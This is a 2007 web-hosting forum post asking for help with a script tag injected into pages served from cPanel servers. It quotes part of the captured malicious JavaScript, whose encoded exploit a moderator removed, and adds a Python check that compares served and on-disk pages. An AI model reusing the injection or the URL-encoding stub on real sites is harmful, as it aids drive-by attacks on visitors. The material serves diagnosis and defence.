WHT Addict
Join Date: May 2004
Location: chicago
Posts: 173

Linux servers having cPanel - JS virus hitting

Hi All,

Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple HTML, PHP, etc.) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean

Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
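var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
// Hex-encode each character of the URL built above
var MH = '';
for (i=0; i < MU.length; i++) {
    var b = MU.charCodeAt (i);
    MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
// Pad with a null byte when the URL length is odd
if (Math.round(MU.length/2) != (MU.length/2)) {
    MH += '00';
}

// Repack the hex string as %uXXXX escapes, swapping the two bytes of each pair
var MR = '';
for (i=0; i < MH.length; i += 4) {
    MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

// Quoted copies of the plain and escaped URL
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
<<removed encoded exploit>>

document.write (SB);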

Rushik Shah

CEO - Alakmalak Technologies
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA

Last edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this
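
A way to confirm the symptom described in the post, as an added example that is not part of the original post: compare each served response with the file on disk and report any script tag that sits directly after <body> only in the served copy. The sample pages are constructed and the function names are hypothetical; the file name shfuy.js is the one quoted in the post.

```python
import re

# A <script src=...> tag directly after the opening <body> tag, which is
# where the post reports the injected tag appearing.
AFTER_BODY = re.compile(
    r"<body\b[^>]*>\s*<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)[^>]*>\s*</script>",
    re.IGNORECASE,
)
ANY_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def find_injected(on_disk_html, served_html):
    """Return the src of a script tag right after <body> in the served
    response that the on-disk file does not reference, else None."""
    match = AFTER_BODY.search(served_html)
    if not match:
        return None
    src = match.group(1)
    known = set(ANY_SRC.findall(on_disk_html))
    return None if src in known else src


def audit(on_disk_html, responses):
    """The injection is intermittent and the file name changes, so check
    many captured responses and return the distinct unexpected names."""
    hits = (find_injected(on_disk_html, body) for body in responses)
    return sorted({h for h in hits if h})


# Constructed sample pages (not captured traffic).
ON_DISK = "<html><head><title>t</title></head>\n<body>\n<h1>Hello</h1>\n</body></html>"
SERVED_INJECTED = ON_DISK.replace(
    "<body>",
    "<body><script language='JavaScript' type='text/javascript' src='shfuy.js'></script>",
)
# A page that legitimately loads a script right after <body> must not be flagged.
LEGIT = ON_DISK.replace("<body>", '<body>\n<script src="/js/site.js"></script>')

if __name__ == "__main__":
    print(audit(ON_DISK, [ON_DISK, SERVED_INJECTED, ON_DISK]))
    print(find_injected(LEGIT, LEGIT))
```

A hit for a name that exists neither in the page source nor on disk points at something modifying responses on the way out rather than at altered site files.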